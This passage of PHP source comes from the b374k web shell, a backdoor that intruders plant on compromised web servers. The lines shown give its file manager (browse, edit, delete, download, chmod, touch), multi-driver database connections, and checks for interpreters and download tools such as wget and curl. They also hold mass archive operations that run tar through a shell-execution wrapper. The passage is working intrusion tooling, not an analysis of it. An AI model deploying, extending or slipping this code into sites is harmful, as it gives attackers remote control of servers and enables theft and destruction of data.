  658.     if($s_win){
  659.         //check if this root directory
  660.         chdir("..");
  661.         if(cp(getcwd())==cp($s_cwd)) array_unshift($s_list, ".");
  662.         chdir($s_cwd);
  663.     }
  664.  
  665.     $s_path = explode(DS,$s_cwd);
  666.     $s_tree = sizeof($s_path);
  667.  
  668.     $s_parent = "";
  669.     if($s_tree > 2) for($s_i = 0; $s_i<$s_tree-2; $s_i++) $s_parent .= $s_path[$s_i].DS;
  670.     else $s_parent = $s_cwd;
  671.  
  672.     $s_owner_html = (!$s_win && $s_posix)? "<th style='width:140px;min-width:140px;'>owner:group</th>":"";
  673.     $s_colspan = (!$s_win && $s_posix)? "5" : "4";
  674.     $s_buff = "<table class='explore sortable'><thead><tr><th style='width:24px;min-width:24px;' class='sorttable_nosort'></th><th style='min-width:150px;'>name</th><th style='width:74px;min-width:74px;'>size</th>".$s_owner_html."<th style='width:80px;min-width:80px;'>perms</th><th style='width:150px;min-width:150px;'>modified</th><th style='width:200px;min-width:200px;' class='sorttable_nosort'>action</th></tr></thead><tbody>";
  675.  
  676.    
  677.     foreach($s_list as $s_l){
  678.         if(!$s_win && $s_posix){
  679.             $s_name = posix_getpwuid(fileowner($s_l));
  680.             $s_group = posix_getgrgid(filegroup($s_l));
  681.             $s_owner = $s_name['name']."<span class='gaya'>:</span>".$s_group['name'];
  682.             $s_owner_html = "<td style='text-align:center;'>".$s_owner."</td>";
  683.         }
  684.  
  685.         $s_lhref = $s_lname = $s_laction = "";
  686.         if(@is_dir($s_l)){
  687.             if($s_l=="."){
  688.                 $s_lhref = $s_self."cd=".pl($s_cwd);
  689.                 $s_lsize = "LINK";
  690.                 $s_laction = "<span id='titik1'><a href='".$s_self."cd=".pl($s_cwd)."&find=".pl($s_cwd)."'>find</a> | <a href='".$s_self."cd=".pl($s_cwd)."&x=upload"."'>upl</a> | <a href='".$s_self."cd=".pl($s_cwd)."&edit=".pl($s_cwd)."newfile_1&new=yes"."'>+file</a> | <a href=\"javascript:tukar('titik1','', 'mkdir','newfolder_1');\">+dir</a></span><div id='titik1_form'></div>";
  691.             }
  692.             elseif($s_l==".."){
  693.                 $s_lhref = $s_self."cd=".pl($s_parent);
  694.                 $s_lsize = "LINK";
  695.                 $s_laction = "<span id='titik2'><a href='".$s_self."cd=".pl($s_parent)."&find=".pl($s_parent)."'>find</a> | <a href='".$s_self."cd=".pl($s_parent)."&x=upload"."'>upl</a> | <a href='".$s_self."cd=".pl($s_parent)."&edit=".pl($s_parent)."newfile_1&new=yes"."'>+file</a> | <a href=\"javascript:tukar('titik2','".adds($s_parent)."', 'mkdir','newfolder_1');\">+dir</a></span><div id='titik2_form'></div>";
  696.             }
  697.             else{
  698.                 $s_lhref = $s_self."cd=".pl($s_cwd.$s_l.DS);
  699.                 $s_lsize = "DIR";
  700.                 $s_laction = "<span id='".cs($s_l)."_'><a href='".$s_self."cd=".pl($s_cwd.$s_l.DS)."&find=".pl($s_cwd.$s_l.DS)."'>find</a> | <a href='".$s_self."cd=".pl($s_cwd.$s_l.DS)."&x=upload"."'>upl</a> | <a href=\"javascript:tukar('".cs($s_l)."_','','rename','".adds($s_l)."','".adds($s_l)."');\">ren</a> | <a href='".$s_self."cd=".pl($s_cwd)."&del=".pl($s_l)."'>del</a></span><div id='".cs($s_l)."__form'></div>";
  701.                 $s_total_dir++;
  702.             }
  703.             $s_lname = "[ ".$s_l." ]";
  704.             $s_lsizetit = "0";
  705.             $s_lnametit = "dir : ".$s_l;
  706.         }
  707.         else{
  708.             $s_lhref = $s_self."view=".pl($s_cwd.$s_l);
  709.             $s_lname = $s_l;
  710.             $s_lsize = gs($s_l);
  711.             $s_lsizetit = @filesize($s_l);
  712.             $s_lnametit = "file : ".$s_l;
  713.             $s_laction = "<span id='".cs($s_l)."_'><a href='".$s_self."edit=".pl($s_cwd.$s_l)."'>edit</a> | <a href='".$s_self."hexedit=".pl($s_cwd.$s_l)."'>hex</a> | <a href=\"javascript:tukar('".cs($s_l)."_','','rename','".adds($s_l)."','".adds($s_l)."');\">ren</a> | <a href='".$s_self."del=".pl($s_cwd.$s_l)."'>del</a> | <a href='".$s_self."dl=".pl($s_cwd.$s_l)."'>dl</a></span><div id='".cs($s_l)."__form'></div>";
  714.             $s_total_file++;
  715.         }
  716.  
  717.         $s_cboxval = $s_cwd.$s_l;
  718.         if($s_l=='.') $s_cboxval = $s_cwd;
  719.         if($s_l=='..') $s_cboxval = $s_parent;
  720.  
  721.         $s_cboxes_id = substr(md5($s_lhref),0,8);
  722.         $s_cboxes = "<input id='".$s_cboxes_id."' name='cbox' value='".hss($s_cboxval)."' type='checkbox' class='css-checkbox' onchange='hilite(this);' /><label for='".$s_cboxes_id."' class='css-label'></label>";
  723.  
  724.         $s_ltime = filemtime($s_l);
  725.         $s_buff .= "<tr><td style='text-align:center;text-indent:4px;'>".$s_cboxes."</td><td class='xpl' title='".$s_lnametit."' ondblclick=\"return go('".adds($s_lhref)."',event);\"><a href='".$s_lhref."'>".$s_lname."</a></td><td title='".$s_lsizetit."'>".$s_lsize."</td>".$s_owner_html."<td class='ce'>".gp($s_l)."</td><td class='ce' title='".$s_ltime."'>".@date("d-M-Y H:i:s",$s_ltime)."</td><td>".$s_laction."</td></tr>";
  726.     }
  727.     $s_buff .= "</tbody>";
  728.  
  729.     $s_extract = ""; $s_compress = "";
  730.     if(class_exists("ZipArchive")){
  731.         $s_extract .= "<option value='extractzip'>extract (zip)</option>";
  732.         $s_compress .= "<option value='compresszip'>compress (zip)</option>";
  733.     }
  734.     if($s_tar){
  735.         $s_extract .= "<option value='extracttar'>extract (tar)</option><option value='extracttargz'>extract (tar.gz)</option>";
  736.         $s_compress .="<option value='compresstar'>compress (tar)</option><option value='compresstargz'>compress (tar.gz)</option>";
  737.     }
  738.  
  739.     $s_extcom = ($s_extract!="" && $s_compress!="")? $s_extract."<option value='' disabled>-</option>".$s_compress:$s_extract.$s_compress;
  740.  
  741.     $s_buff .= "<tfoot><tr class='cbox_selected'><td class='cbox_all'><input id='checkalll' type='checkbox' name='abox' class='css-checkbox' onclick='checkall();' /> <label for='checkalll' class='css-label'></label></td><td><form action='".$s_self."' method='post'><select id='massact' class='inputzbut' onchange='massactgo();' style='width:100%;height:20px;margin:0;'><option value='' disabled selected>Action</option><option value='cut'>cut</option><option value='copy'>copy</option><option value='paste'>paste</option><option value='delete'>delete</option><option value='' disabled>-</option><option value='chmod'>chmod</option><option value='touch'>touch</option><option value='' disabled>-</option>".$s_extcom."</select><noscript><input type='button' value='Go !' class='inputzbut' onclick='massactgo();' /></noscript></form></td><td colspan='".$s_colspan."' style='text-align:left;'>Total : ".$s_total_file." files, ".$s_total_dir." Directories<span id='total_selected'></span></td></tr></tfoot></table>";
  742.  
  743.     return $s_buff;
  744. }
  745. //database related functions
  746. function sql_connect($s_sqltype, $s_sqlhost, $s_sqluser, $s_sqlpass){
  747.     if($s_sqltype == 'mysql'){
  748.         if(class_exists('mysqli')) return new mysqli($s_sqlhost, $s_sqluser, $s_sqlpass);
  749.         elseif(function_exists('mysql_connect')) return @mysql_connect($s_sqlhost, $s_sqluser, $s_sqlpass);
  750.     }
  751.     elseif($s_sqltype == 'mssql'){
  752.         if(function_exists('sqlsrv_connect')){
  753.             $s_coninfo = array("UID"=>$s_sqluser, "PWD"=>$s_sqlpass);
  754.             return @sqlsrv_connect($s_sqlhost,$s_coninfo);
  755.         }
  756.         elseif(function_exists('mssql_connect')) return @mssql_connect($s_sqlhost, $s_sqluser, $s_sqlpass);
  757.     }
  758.     elseif($s_sqltype == 'pgsql'){
  759.         $s_hosts = explode(":", $s_sqlhost);
  760.         if(count($s_hosts)==2){
  761.             $s_host_str = "host=".$s_hosts[0]." port=".$s_hosts[1];
  762.         }
  763.         else $s_host_str = "host=".$s_sqlhost;
  764.         if(function_exists('pg_connect')) return @pg_connect("$s_host_str user=$s_sqluser password=$s_sqlpass");
  765.     }
  766.     elseif($s_sqltype == 'oracle'){ if(function_exists('oci_connect')) return @oci_connect($s_sqluser, $s_sqlpass, $s_sqlhost); }
  767.     elseif($s_sqltype == 'sqlite3'){
  768.         if(class_exists('SQLite3')) if(!empty($s_sqlhost)) return new SQLite3($s_sqlhost);
  769.         else return false;
  770.     }
  771.     elseif($s_sqltype == 'sqlite'){ if(function_exists('sqlite_open')) return @sqlite_open($s_sqlhost); }
  772.     elseif($s_sqltype == 'odbc'){ if(function_exists('odbc_connect')) return @odbc_connect($s_sqlhost, $s_sqluser, $s_sqlpass); }
  773.     elseif($s_sqltype == 'pdo'){
  774.         if(class_exists('PDO')) if(!empty($s_sqlhost)) return new PDO($s_sqlhost, $s_sqluser, $s_sqlpass);
  775.         else return false;
  776.     }
  777.     return false;
  778. }
  779. function sql_query($s_sqltype, $s_query, $s_con){
  780.     if($s_sqltype == 'mysql'){
  781.         if(class_exists('mysqli')) return $s_con->query($s_query);
  782.         elseif(function_exists('mysql_query')) return mysql_query($s_query);
  783.     }
  784.     elseif($s_sqltype == 'mssql'){
  785.         if(function_exists('sqlsrv_query')) return sqlsrv_query($s_con,$s_query);
  786.         elseif(function_exists('mssql_query')) return mssql_query($s_query);
  787.     }
  788.     elseif($s_sqltype == 'pgsql') return pg_query($s_query);
  789.     elseif($s_sqltype == 'oracle') return oci_execute(oci_parse($s_con, $s_query));
  790.     elseif($s_sqltype == 'sqlite3') return $s_con->query($s_query);
  791.     elseif($s_sqltype == 'sqlite') return sqlite_query($s_con, $s_query);
  792.     elseif($s_sqltype == 'odbc') return odbc_exec($s_con, $s_query);
  793.     elseif($s_sqltype == 'pdo') return $s_con->query($s_query);
  794. }
  795. function sql_num_rows($s_sqltype,$s_hasil){
  796.     if($s_sqltype == 'mysql'){
  797.         if(class_exists('mysqli_result')) return $s_hasil->mysqli_num_rows;
  798.         elseif(function_exists('mysql_num_rows')) return mysql_num_rows($s_hasil);
  799.     }
  800.     elseif($s_sqltype == 'mssql'){
  801.         if(function_exists('sqlsrv_num_rows')) return sqlsrv_num_rows($s_hasil);
  802.         elseif(function_exists('mssql_num_rows')) return mssql_num_rows($s_hasil);
  803.     }
  804.     elseif($s_sqltype == 'pgsql') return pg_num_rows($s_hasil);
  805.     elseif($s_sqltype == 'oracle') return oci_num_rows($s_hasil);
  806.     elseif($s_sqltype == 'sqlite3'){
  807.         $s_metadata = $s_hasil->fetchArray();
  808.         if(is_array($s_metadata)) return $s_metadata['count'];
  809.     }
  810.     elseif($s_sqltype == 'sqlite') return sqlite_num_rows($s_hasil);
  811.     elseif($s_sqltype == 'odbc') return odbc_num_rows($s_hasil);
  812.     elseif($s_sqltype == 'pdo') return $s_hasil->rowCount();
  813. }
  814. function sql_num_fields($s_sqltype, $s_hasil){
  815.     if($s_sqltype == 'mysql'){
  816.         if(class_exists('mysqli_result')) return $s_hasil->field_count;
  817.         elseif(function_exists('mysql_num_fields')) return mysql_num_fields($s_hasil);
  818.     }
  819.     elseif($s_sqltype == 'mssql'){
  820.         if(function_exists('sqlsrv_num_fields')) return sqlsrv_num_fields($s_hasil);
  821.         elseif(function_exists('mssql_num_fields')) return mssql_num_fields($s_hasil);
  822.     }
  823.     elseif($s_sqltype == 'pgsql') return pg_num_fields($s_hasil);
  824.     elseif($s_sqltype == 'oracle') return oci_num_fields($s_hasil);
  825.     elseif($s_sqltype == 'sqlite3') return $s_hasil->numColumns();
  826.     elseif($s_sqltype == 'sqlite') return sqlite_num_fields($s_hasil);
  827.     elseif($s_sqltype == 'odbc') return odbc_num_fields($s_hasil);
  828.     elseif($s_sqltype == 'pdo') return $s_hasil->columnCount();
  829. }
  830. function sql_field_name($s_sqltype,$s_hasil,$s_i){
  831.     if($s_sqltype == 'mysql'){
  832.         if(class_exists('mysqli_result')) { $z=$s_hasil->fetch_field();return $z->name;}
  833.         elseif(function_exists('mysql_field_name')) return mysql_field_name($s_hasil,$s_i);
  834.     }
  835.     elseif($s_sqltype == 'mssql'){
  836.         if(function_exists('sqlsrv_field_metadata')){
  837.             $s_metadata = sqlsrv_field_metadata($s_hasil);
  838.             if(is_array($s_metadata)){
  839.                 $s_metadata=$s_metadata[$s_i];
  840.             }
  841.             if(is_array($s_metadata)) return $s_metadata['Name'];
  842.         }
  843.         elseif(function_exists('mssql_field_name')) return mssql_field_name($s_hasil,$s_i);
  844.     }
  845.     elseif($s_sqltype == 'pgsql') return pg_field_name($s_hasil,$s_i);
  846.     elseif($s_sqltype == 'oracle') return oci_field_name($s_hasil,$s_i+1);
  847.     elseif($s_sqltype == 'sqlite3') return $s_hasil->columnName($s_i);
  848.     elseif($s_sqltype == 'sqlite') return sqlite_field_name($s_hasil,$s_i);
  849.     elseif($s_sqltype == 'odbc') return odbc_field_name($s_hasil,$s_i+1);
  850.     elseif($s_sqltype == 'pdo'){
  851.         $s_res = $s_hasil->getColumnMeta($s_i);
  852.         return $s_res['name'];
  853.     }
  854. }
  855. function sql_fetch_data($s_sqltype,$s_hasil){
  856.     if($s_sqltype == 'mysql'){
  857.         if(class_exists('mysqli_result')) return $s_hasil->fetch_row();
  858.         elseif(function_exists('mysql_fetch_row')) return mysql_fetch_row($s_hasil);
  859.     }
  860.     elseif($s_sqltype == 'mssql'){
  861.         if(function_exists('sqlsrv_fetch_array')) return sqlsrv_fetch_array($s_hasil,1);
  862.         elseif(function_exists('mssql_fetch_row')) return mssql_fetch_row($s_hasil);
  863.     }
  864.     elseif($s_sqltype == 'pgsql') return pg_fetch_row($s_hasil);
  865.     elseif($s_sqltype == 'oracle') return oci_fetch_row($s_hasil);
  866.     elseif($s_sqltype == 'sqlite3') return $s_hasil->fetchArray(1);
  867.     elseif($s_sqltype == 'sqlite') return sqlite_fetch_array($s_hasil,1);
  868.     elseif($s_sqltype == 'odbc') return odbc_fetch_array($s_hasil);
  869.     elseif($s_sqltype == 'pdo') return $s_hasil->fetch(2);
  870. }
  871. function sql_close($s_sqltype,$s_con){
  872.     if($s_sqltype == 'mysql'){
  873.         if(class_exists('mysqli')) return $s_con->close();
  874.         elseif(function_exists('mysql_close')) return mysql_close($s_con);
  875.     }
  876.     elseif($s_sqltype == 'mssql'){
  877.         if(function_exists('sqlsrv_close')) return sqlsrv_close($s_con);
  878.         elseif(function_exists('mssql_close')) return mssql_close($s_con);
  879.     }
  880.     elseif($s_sqltype == 'pgsql') return pg_close($s_con);
  881.     elseif($s_sqltype == 'oracle') return oci_close($s_con);
  882.     elseif($s_sqltype == 'sqlite3') return $s_con->close();
  883.     elseif($s_sqltype == 'sqlite') return sqlite_close($s_con);
  884.     elseif($s_sqltype == 'odbc') return odbc_close($s_con);
  885.     elseif($s_sqltype == 'pdo') return $s_con = null;
  886. }
  887. if(!function_exists('str_split')){
  888.     function str_split($s_t,$s_s=1){
  889.         $s_a = array();
  890.         for($s_i = 0; $s_i<strlen($s_t);){
  891.             $s_a[] = substr($s_t,$s_i,$s_s);
  892.             $s_i += $s_s;
  893.         }
  894.         return $s_a;
  895.     }
  896. }
  897.  
  898. // appearance
  899. $s_theme = "dark"; // default is dark
  900. if(isset($_COOKIE['theme'])) $s_theme = $_COOKIE['theme'];
  901. if(isset($_GP['x']) && ($_GP['x']=='switch')){
  902.     if(isset($_COOKIE['theme'])) $s_theme = $_COOKIE['theme'];
  903.     if($s_theme=="bright") $s_theme = "dark";
  904.     else $s_theme = "bright";
  905.     setcookie("theme", $s_theme ,time() + $s_login_time);
  906. }
  907. $s_highlight_dark = array("4C9CAF", "888888", "87DF45", "EEEEEE" , "FF8000");
  908. $s_highlight_bright = array("B36350", "777777", "7820BA", "111111" , "007FFF");
  909.  
  910. global $s_self, $s_win, $s_posix;
  911.  
  912. $s_self = "?";
  913. $s_cek1 = basename($_SERVER['SCRIPT_FILENAME']);
  914. $s_cek2 = substr(basename(__FILE__),0,strlen($s_cek1));
  915.  
  916. if(isset($_COOKIE['b374k_included'])){
  917.     if(strcmp($s_cek1,$s_cek2)!=0) $s_self = $_COOKIE['s_self'];
  918.     else{
  919.         $s_self = "?";
  920.         setcookie("b374k_included", "0" ,time() - $s_login_time);
  921.         setcookie("s_self", $s_self ,time() + $s_login_time);
  922.     }
  923. }
  924. else{
  925.     if(strcmp($s_cek1,$s_cek2)!=0){
  926.         if(!isset($_COOKIE['s_home'])){
  927.             $s_home = "?".$_SERVER["QUERY_STRING"]."&";
  928.             setcookie("s_home", $s_home ,time() + $s_login_time);
  929.         }
  930.         if(isset($s_home)) $s_self = $s_home;
  931.         elseif(isset($_COOKIE['s_home'])) $s_self = $_COOKIE['s_home'];
  932.         setcookie("b374k_included", "1" ,time() + $s_login_time);
  933.         setcookie("s_self", $s_self ,time() + $s_login_time);
  934.     }
  935.     else{
  936.         $s_self = "?";
  937.         setcookie("b374k_included", "0" ,time() - $s_login_time);
  938.         setcookie("s_self", $s_self ,time() + $s_login_time);
  939.     }
  940. }
  941. $s_cwd = "";
  942.  
  943. if(isset($_GP['|'])) showcode($s_css);
  944. elseif(isset($_GP['!'])) showcode($s_js);
  945.  
  946. if($s_auth){
  947.     // server software
  948.     $s_software = getenv("SERVER_SOFTWARE");
  949.     // uname -a
  950.     $s_system = php_uname();
  951.     // check os
  952.     $s_win = (strtolower(substr($s_system,0,3)) == "win")? true : false;
  953.     // check for posix
  954.     $s_posix = (function_exists("posix_getpwuid"))? true : false;
  955.     // change working directory
  956.     if(isset($_GP['cd'])){
  957.         $s_dd = $_GP['cd'];
  958.         if(@is_dir($s_dd)){
  959.             $s_cwd = cp($s_dd);
  960.             chdir($s_cwd);
  961.             setcookie("cwd", $s_cwd ,time() + $s_login_time);
  962.         }
  963.         else $s_cwd = isset($_COOKIE['cwd'])? cp($_COOKIE['cwd']):cp(getcwd());;
  964.     }
  965.     else{
  966.         if(isset($_COOKIE['cwd'])){
  967.             $s_dd = ss($_COOKIE['cwd']);
  968.             if(@is_dir($s_dd)){
  969.                 $s_cwd = cp($s_dd);
  970.                 chdir($s_cwd);
  971.             }
  972.         }
  973.         else $s_cwd = cp(getcwd());
  974.     }
  975.  
  976.     if(!$s_win && $s_posix){
  977.         $s_userarr = posix_getpwuid(posix_geteuid());
  978.         if(isset($s_userarr['name'])) $s_user = $s_userarr['name'];
  979.         else $s_user = "$";
  980.     }
  981.     else {
  982.         $s_user = get_current_user();
  983.     }
  984.  
  985.     // prompt style
  986.     $s_prompt = $s_user." &gt;";
  987.     // server ip
  988.     $s_server_ip = gethostbyname($_SERVER["HTTP_HOST"]);
  989.     // your ip ;-)
  990.     $s_my_ip = $_SERVER['REMOTE_ADDR'];
  991.     $s_result = "";
  992.  
  993.     global $s_python, $s_perl, $s_ruby, $s_node, $s_nodejs, $s_gcc, $s_java, $s_javac, $s_tar, $s_wget, $s_lwpdownload, $s_lynx, $s_curl;
  994.  
  995.     $s_access = array("s_python", "s_perl", "s_ruby", "s_node", "s_nodejs", "s_gcc", "s_java", "s_javac", "s_tar", "s_wget", "s_lwpdownload", "s_lynx", "s_curl");
  996.     foreach($s_access as $s){
  997.         if(isset($_COOKIE[$s])){ $$s = $_COOKIE[$s]; }
  998.         else{
  999.             if(!isset($_COOKIE['b374k'])){
  1000.                 $t = explode("_", $s);
  1001.                 $t = check_access($t[1]);
  1002.                 if($t!==false){
  1003.                     $$s = $t;
  1004.                     setcookie($s, $$s ,time() + $s_login_time);
  1005.                 }
  1006.             }
  1007.         }
  1008.     }
  1009.  
  1010.     // download file specified by ?dl=<file>
  1011.     if(isset($_GP['dl']) && ($_GP['dl'] != "")){
  1012.         ob_end_clean();
  1013.         $f = $_GP['dl'];
  1014.         $fc = fgc($f);
  1015.         header("Content-type: application/octet-stream");
  1016.         header("Content-length: ".strlen($fc));
  1017.         header("Content-disposition: attachment; filename=\"".basename($f)."\";");
  1018.         echo $fc;
  1019.         die();
  1020.     }
  1021.     // massact
  1022.     if(isset($_GP['z'])){
  1023.         $s_massact = isset($_COOKIE['massact'])? $_COOKIE['massact']:"";
  1024.         $s_buffer = isset($_COOKIE['buffer'])? rtrim(ss($_COOKIE['buffer']),"|"):"";
  1025.         $s_lists = explode("|", $s_buffer);
  1026.  
  1027.         $s_counter = 0;
  1028.         if(!empty($s_buffer)){
  1029.             if($_GP['z']=='moveok'){
  1030.                 foreach($s_lists as $s_l) if(rename($s_l,$s_cwd.basename($s_l))) $s_counter++;
  1031.                 if($s_counter>0) $s_result .= notif($s_counter." items moved");
  1032.                 else $s_result .= notif("No items moved");
  1033.             }
  1034.             elseif($_GP['z']=='copyok'){
  1035.                 foreach($s_lists as $s_l){
  1036.                     if(@is_dir($s_l)){
  1037.                         copys($s_l,$s_cwd.basename($s_l));
  1038.                         if(file_exists($s_cwd.basename($s_l))) $s_counter++;
  1039.                     }
  1040.                     elseif(@is_file($s_l)){
  1041.                         copy($s_l,$s_cwd.basename($s_l));
  1042.                         if(file_exists($s_cwd.basename($s_l))) $s_counter++;
  1043.                     }
  1044.                 }
  1045.                 if($s_counter>0) $s_result .= notif($s_counter." items copied");
  1046.                 else $s_result .= notif("No items copied");
  1047.             }
  1048.             elseif($_GP['z']=='delok'){
  1049.                 foreach($s_lists as $s_l){
  1050.                     if(@is_file($s_l)){
  1051.                         if(unlink($s_l)) $s_counter++;
  1052.                     }
  1053.                     elseif(@is_dir($s_l)){
  1054.                         rmdirs($s_l);
  1055.                         if(!file_exists($s_l)) $s_counter++;
  1056.                     }
  1057.                 }
  1058.                 if($s_counter>0) $s_result .= notif($s_counter." items deleted");
  1059.                 else $s_result .= notif("No items deleted");
  1060.             }
  1061.             elseif(isset($_GP['chmodok'])){
  1062.                 $s_mod = octdec($_GP['chmodok']);
  1063.                 foreach($s_lists as $s_l) if(chmod($s_l,$s_mod)) $s_counter++;
  1064.                 if($s_counter>0) $s_result .= notif($s_counter." items changed mode to ".decoct($s_mod));
  1065.                 else $s_result .= notif("No items modified");
  1066.             }
  1067.             elseif(isset($_GP['touchok'])){
  1068.                 $s_datenew = strtotime($_GP['touchok']);
  1069.                 foreach($s_lists as $s_l) if(touch($s_l,$s_datenew)) $s_counter++;
  1070.                 if($s_counter>0) $s_result .= notif($s_counter." items changed access and modification time to ".@date("d-M-Y H:i:s",$s_datenew));
  1071.                 else $s_result .= notif("No items modified");
  1072.             }
  1073.             elseif(isset($_GP['compresszipok'])){
  1074.                 $s_file = $_GP['compresszipok'];
  1075.                 if(zip($s_lists, $s_file)) $s_result .= notif("Archive created : ".hss($s_file));
  1076.                 else $s_result .= notif("Error creating archive file");
  1077.             }
  1078.             elseif(isset($_GP['compresstarok'])){
  1079.                 $s_lists_ = array();
  1080.                 $s_file = $_GP['compresstarok'];
  1081.                 $s_file = basename($s_file);
  1082.  
  1083.                 $s_lists__ = array_map("basename", $s_lists);
  1084.                 $s_lists_ = array_map("pf", $s_lists__);
  1085.                 exe("tar cf \"".$s_file."\" ".implode(" ", $s_lists_));
  1086.  
  1087.                 if(@is_file($s_file)) $s_result .= notif("Archive created : ".hss($s_file));
  1088.                 else $s_result .= notif("Error creating archive file");
  1089.             }
  1090.             elseif(isset($_GP['compresstargzok'])){
  1091.                 $s_lists_ = array();
  1092.                 $s_file = $_GP['compresstargzok'];
  1093.                 $s_file = basename($s_file);
  1094.  
  1095.                 $s_lists__ = array_map("basename", $s_lists);
  1096.                 $s_lists_ = array_map("pf", $s_lists__);
  1097.                 exe("tar czf \"".$s_file."\" ".implode(" ", $s_lists_));
  1098.  
  1099.                 if(@is_file($s_file)) $s_result .= notif("Archive created : ".hss($s_file));
  1100.                 else $s_result .= notif("Error creating archive file");
  1101.             }
  1102.             elseif(isset($_GP['extractzipok'])){
  1103.                 $s_file = $_GP['extractzipok'];
  1104.                 $zip = new ZipArchive();
  1105.                 foreach($s_lists as $f){
  1106.                     $s_target = $s_file.basename($f,".zip");
  1107.                     if($zip->open($f)){
  1108.                         if(!@is_dir($s_target)) @mkdir($s_target);
  1109.                         if($zip->extractTo($s_target)) $s_result .= notif("Files extracted to ".hss($s_target));
  1110.                         else $s_result .= notif("Error extrating archive file");
  1111.                         $zip->close();
  1112.                     }
  1113.                     else $s_result .= notif("Error opening archive file");
  1114.                 }
  1115.             }
  1116.             elseif(isset($_GP['extracttarok'])){
  1117.                 $s_file = $_GP['extracttarok'];
  1118.                 foreach($s_lists as $f){
  1119.                     $s_target = "";
  1120.                     $s_target = basename($f,".tar");
  1121.                     if(!@is_dir($s_target)) @mkdir($s_target);
  1122.                     exe("tar xf \"".basename($f)."\" -C \"".$s_target."\"");
  1123.                 }
  1124.             }
  1125.             elseif(isset($_GP['extracttargzok'])){
  1126.                 $s_file = $_GP['extracttargzok'];
  1127.                 foreach($s_lists as $f){
  1128.                     $s_target = "";
  1129.                     if(strpos(strtolower($f), ".tar.gz")!==false) $s_target = basename($f,".tar.gz");
  1130.                     elseif(strpos(strtolower($f), ".tgz")!==false) $s_target = basename($f,".tgz");
  1131.                     if(!@is_dir($s_target)) @mkdir($s_target);
  1132.                     exe("tar xzf \"".basename($f)."\" -C \"".$s_target."\"");
  1133.                 }
  1134.             }
  1135.         }
  1136.         setcookie("buffer", "" ,time() - $s_login_time);
  1137.         setcookie("massact", "" ,time() - $s_login_time);
  1138.     }
  1139.     if(isset($_GP['y'])){
  1140.         $s_massact = isset($_COOKIE['massact'])? $_COOKIE['massact']:"";
  1141.         $s_buffer = isset($_COOKIE['buffer'])? rtrim(ss($_COOKIE['buffer']),"|"):"";
  1142.         $s_lists = explode("|", $s_buffer);
  1143.  
  1144.         if(!empty($s_buffer)){
  1145.             if($_GP['y']=='delete'){
  1146.                 $s_result .= notif("Delete ? <a href='".$s_self."z=delok"."'>Yes</a> | <a href='".$s_self."'>No</a>");
  1147.                 foreach($s_lists as $s_l) $s_result .= notif($s_l);
  1148.             }
  1149.             elseif($_GP['y']=='paste' && $s_massact=='cut'){
  1150.                 $s_result .= notif("Move here ? <a href='".$s_self."z=moveok"."'>Yes</a> | <a href='".$s_self."'>No</a>");
  1151.                 foreach($s_lists as $s_l) $s_result .= notif($s_l);
  1152.             }
  1153.             elseif($_GP['y']=='paste' && $s_massact=='copy'){
  1154.                 $s_result .= notif("Copy here ? <a href='".$s_self."z=copyok"."'>Yes</a> | <a href='".$s_self."'>No</a>");
  1155.                 foreach($s_lists as $s_l) $s_result .= notif($s_l);
  1156.             }
  1157.             elseif($_GP['y']=='chmod'){
  1158.                 $s_result .= notif("Permissions ? <form action='".$s_self."' method='post'><input class='inputz' type='text' value='0755' name='chmodok' style='width:30px;text-align:center;' maxlength='4' /><input class='inputzbut' name='z' type='submit' value='Go !' /></form>");
  1159.                 foreach($s_lists as $s_l) $s_result .= notif($s_l);
  1160.             }
  1161.             elseif($_GP['y']=='touch'){
  1162.                 $s_result .= notif("Touch ? <form action='".$s_self."' method='post'><input class='inputz' type='text' value='".@date("d-M-Y H:i:s",time())."' name='touchok' style='width:130px;text-align:center;' /><input class='inputzbut' name='z' type='submit' value='Go !' /></form>");
  1163.                 foreach($s_lists as $s_l) $s_result .= notif($s_l);
  1164.             }
  1165.             elseif($_GP['y']=='extractzip'){
  1166.                 $s_result .= notif("Extract to ? <form action='".$s_self."' method='post'><input class='inputz' type='text' value='".hss($s_cwd)."' name='extractzipok' style='width:50%;' /><input class='inputzbut' name='z' type='submit' value='Go !' /></form>");
  1167.                 foreach($s_lists as $s_l) $s_result .= notif($s_l);
  1168.             }
  1169.             elseif($_GP['y']=='extracttar'){
  1170.                 $s_result .= notif("Extract to ? <form action='".$s_self."' method='post'><input class='inputz' type='text' value='".hss($s_cwd)."' name='extracttarok' style='width:50%;' /><input class='inputzbut' name='z' type='submit' value='Go !' /></form>");
  1171.                 foreach($s_lists as $s_l) $s_result .= notif($s_l);
  1172.             }
  1173.             elseif($_GP['y']=='extracttargz'){
  1174.                 $s_result .= notif("Extract to ? <form action='".$s_self."' method='post'><input class='inputz' type='text' value='".hss($s_cwd)."' name='extracttargzok' style='width:50%;' /><input class='inputzbut' name='z' type='submit' value='Go !' /></form>");
  1175.                 foreach($s_lists as $s_l) $s_result .= notif($s_l);
  1176.             }
  1177.             elseif($_GP['y']=='compresszip'){
  1178.                 $s_result .= notif("Compress to ? <form action='".$s_self."' method='post'><input class='inputz' type='text' value='".hss($s_cwd).substr(md5(time()),0,8).".zip' name='compresszipok' style='width:50%;' /><input class='inputzbut' name='z' type='submit' value='Go !' /></form>");
  1179.                 foreach($s_lists as $s_l) $s_result .= notif($s_l);
  1180.             }
  1181.             elseif($_GP['y']=='compresstar'){
  1182.                 $s_result .= notif("Compress to ? <form action='".$s_self."' method='post'><input class='inputz' type='text' value='".hss($s_cwd).substr(md5(time()),0,8).".tar' name='compresstarok' style='width:50%;' /><input class='inputzbut' name='z' type='submit' value='Go !' /></form>");
  1183.                 foreach($s_lists as $s_l) $s_result .= notif($s_l);
  1184.             }
  1185.             elseif($_GP['y']=='compresstargz'){
  1186.                 $s_result .= notif("Compress to ? <form action='".$s_self."' method='post'><input class='inputz' type='text' value='".hss($s_cwd).substr(md5(time()),0,8).".tar.gz' name='compresstargzok' style='width:50%;' /><input class='inputzbut' name='z' type='submit' value='Go !' /></form>");
  1187.                 foreach($s_lists as $s_l) $s_result .= notif($s_l);
  1188.             }
  1189.         }
  1190.     }
  1191.  
  1192.     // view image specified by ?img=<file>
  1193.     if(isset($_GP['img'])){
  1194.         ob_end_clean();
  1195.         $s_d = isset($_GP['d'])? $_GP['d']:"";
  1196.         $s_f = $_GP['img'];
  1197.         $s_inf = @getimagesize($s_d.$s_f);
  1198.         $s_ext = explode($s_f, ".");
  1199.         $s_ext = $s_ext[count($s_ext)-1];
  1200.         header("Content-type: ".$s_inf["mime"]);
  1201.         header("Cache-control: public");
  1202.         header("Expires: ".@date("r", @mktime(0,0,0,1,1,2030)));
